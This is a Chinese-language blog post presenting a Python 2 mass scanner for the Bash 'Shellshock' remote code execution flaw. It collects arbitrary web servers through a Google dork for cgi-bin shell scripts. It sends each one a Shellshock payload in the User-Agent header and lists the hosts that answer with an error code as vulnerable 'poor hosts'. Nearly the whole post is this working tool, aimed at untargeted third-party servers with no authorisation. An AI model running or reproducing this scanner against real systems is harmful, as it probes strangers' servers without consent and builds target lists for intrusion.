Bash遠程代碼執行漏洞的威力確實要比心臟滴血大很多,但是影響範圍不是很廣泛,不過昨天的分析文章Bash遠程代碼執行漏洞分析中末尾提到了這個漏洞的批量問題。
其中最最簡單的方法就是使用搜索引擎的hacking技術,這裏我使用的Google Hacking語法結合Google API來進行鏈接的抓取。只不過在國內的話。。。。需要加代理。
程序中的代理是我本地的goagent代理,端口是8087。如何檢測漏洞思路也很簡單,我這裏直接根據服務器返回碼進行判斷的。
思路就是以上這些,下面還是和往常一樣,貼代碼:
#coding=utf-8
import requests
import json
import sys
import threading
import socket
vul_res = []
class GoogleURLProvider():
def __init__(self,pageCount,proxies):
self.pageCount = pageCount #查詢的頁數
self.keywords = r'inurl:cgi-bin filetype:sh'
self.apiurl = "https://ajax.googleapis.com/ajax/services/search/web"
self.proxies = proxies
def getRequest(self,url):
return requests.get(url,proxies=self.proxies,verify=False)
def getUrls(self):
ret_list = []
tmp_list = []
for x in xrange(0,self.pageCount):
url = "{apiurl}?v=1.0&q={keywords}&rsz=8&start={pageCount}".format(apiurl=self.apiurl,keywords=self.keywords,pageCount=x)
try:
r = self.getRequest(url)
results = json.loads(r.text)
if not results:
continue
infos = results['responseData']['results']
if infos:
for i in infos:
tmp_list.append(i['url'])
except Exception, e:
continue
ret_list = ret_list + tmp_list
return ret_list
class BashRCEDetector():
def __init__(self,urls):
self.urls = urls
def detector(self):
global vul_res
for x in self.urls:
#多線程執行
each = EachWorker(x)
each.start()
each.join()
'''線程工作類'''
class EachWorker(threading.Thread):
def __init__(self,url):
threading.Thread.__init__(self)
self.url = url
def run(self):
global vul_res
useragent_header = {
'User-Agent':'''() { 1;}; echo 'eee'''
}
try:
r = requests.get(self.url,headers = useragent_header,timeout=8)
if r.status_code == 500:
print "{url} has Bash RCE vulnerability".format(url=self.url)
vul_res.append(self.url)
else:
pass
except socket.timeout, e:
pass
except requests.exceptions.Timeout, e:
pass
except requests.exceptions.ConnectionError, e:
pass
if __name__ == '__main__':
print 'Powered by:Exploit QQ:739858341'
print 'This is a program which you can use to scan the BashRCE vulnerability\nScanner working,please wait....'
if len(sys.argv) != 2:
print 'Usage:python BashRCEScanner <google pageCount>'
sys.exit()
#goagent proxy
#在這裏修改,加入你自己的代理即可使用
proxies = {
'http':"http://127.0.0.1:8087",
'https':"http://127.0.0.1:8087"
}
url_res = []
vul_guys = []
urlgetter = GoogleURLProvider(int(sys.argv[1]),proxies)
url_res = urlgetter.getUrls()
bash_detector = BashRCEDetector(url_res)
bash_detector.detector()
if len(vul_res) == 0:
print 'This group have no vulnerability'
else:
print 'Find %d poor host(s)' % len(vul_res)
運行截圖: